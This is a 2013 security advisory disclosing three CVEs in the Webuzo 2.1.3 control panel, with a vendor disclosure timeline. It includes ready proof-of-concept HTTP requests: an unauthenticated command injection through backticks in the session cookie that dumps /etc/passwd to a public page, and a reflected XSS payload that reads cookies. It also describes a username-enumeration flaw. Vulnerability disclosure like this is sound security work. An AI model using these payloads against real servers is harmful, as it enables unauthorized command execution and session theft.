# Exploit Title: Webuzo Multiple Vulnerabilities
# Date: 7 October 2013
# Exploit Author: Mahendra
# Vendor Homepage: www.webuzo.com
# Software Link: http://downloads.webuzo.com/va.php
# Version: 2.1.3, other version might be vulnerable.
# Tested on: CentOS release 6.2 (FINAL)
# CVE : CVE-2013-6041, CVE-2013-6042, CVE-2013-6043
----------------------------------------------------
----------------------------------------------------
*Advisory details*
Webuzo 2.1.3 has been identified with multiple security vulnerabilities, which can be exploited to perform remote OS command injection, execute malicious script and enumerate users.
Authentication is not required to exploit these issues.
*Proof of Concept (PoC)*
----------------------------------------------------
Remote OS Command Injection (Webuzo) - CVE-2013-6041
----------------------------------------------------
GET /index.php?act=login HTTP/1.1
Host: xx.xx.xx.xx:2002
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: SOFTCookies7972_sid=[this is your cookie value]`cat /etc/passwd > /home/admin/public_html/pwned.html`
Connection: keep-alive
Cache-Control: max-age=0
--------------------------------------------------------------------
Reflected Cross-site scripting (File Manager module) - CVE-2013-6042
--------------------------------------------------------------------
Eventhough the user parameter is not validated properly which resulted in XSS, there are sets of security protection in place provided by vendor. There is security token which randomly generated, however the token is passed via URL and HTTPS is not enforced by default. The vendor also claims that the token is assigned only to a particular IP address which will logout the user if the token is used by another IP address.
This issue can be considered as informational or very low risk issue depending on the environment setup and method used by attacker to obtain the token.
HTTP Request : POST
Affected parameter : user
URL/page : /filemanager/login.php
Payload : 1" onmouseover=alert(document.cookie) pwned="
POST /sesseisbp4bciukbenlo/filemanager/login.php HTTP/1.1
Host: xx.xx.xx.xx:2002
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.xx.xx.xx:2002/sesseisbp4bciukbenlo/filemanager/login.php
Cookie: navphp=ajax; navphp_cols=9; catforums=2; catblogs=2; catwikis=2; catcalendars=2; catgames=2; catmail=2; catpolls=2; catfiles=2; SOFTCookies7972_sid=eisbp4bciukbenlouewpgmwjlgchervf; PHPSESSID=28u75itaq1gob5it0lfb7cesg5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
user=1"+onmouseover=alert(document.cookie)+pwned="&passwd=asd&action=Login
----------------------------------------------------
Username enumeration - CVE-2013-6043
----------------------------------------------------
1. Valid username and invalid password -> application returns “The username and password you entered is incorrect”
2. Invalid username and password -> application returns “The Webuzo username you entered is invalid"
*Advisory Timeline*
02-10-2013: Vendor notified
02-10-2013: Vendor acknowledged issues.
03-10-2013: Vendor released new version 2.1.4 - http://www.softaculous.com/board/index.php?tid=4526&title=Webuzo_2.1.4_Launched
10-10:2013: This advisory is published
